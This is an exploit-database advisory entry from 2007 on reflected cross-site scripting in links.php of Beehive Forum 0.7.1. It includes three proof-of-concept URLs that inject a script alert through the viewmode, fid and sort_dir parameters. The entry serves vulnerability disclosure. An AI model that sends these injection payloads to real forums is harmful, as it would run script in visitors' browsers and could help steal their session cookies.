Beehive Forum 0.7.1 - links.php Multiple Cross-Site Scripting Vulnerabilities

2007-06-11T00:00:00
ID EXPLOITPACK:18E22BC2F03C422BE5D958E50D187E78
Type exploitpack
Reporter Ory Segal
Modified 2007-06-11T00:00:00

Description

Beehive Forum 0.7.1 - links.php Multiple Cross-Site Scripting Vulnerabilities

                                        
                                            source: https://www.securityfocus.com/bid/24413/info

Beehive Forum is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.

An attacker may leverage any of these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Beehive Forum 0.71 is vulnerable; other versions may also be affected. 

http://www.example.com/forum/links.php?webtag=FORUM_NAME&fid=1&viewmode=>".><script>alert(1);</script> http://www.example.com/forum/links.php?webtag=FOEUM_NAME&fid=>".><script>alert(1);</script>&viewmode=1 http://www.example.com/forum/links.php?webtag=FORUM_NAME&fid=1&viewmode=0&page=1&sort_by=CREATED&sort_dir="><script>alert(1)</script>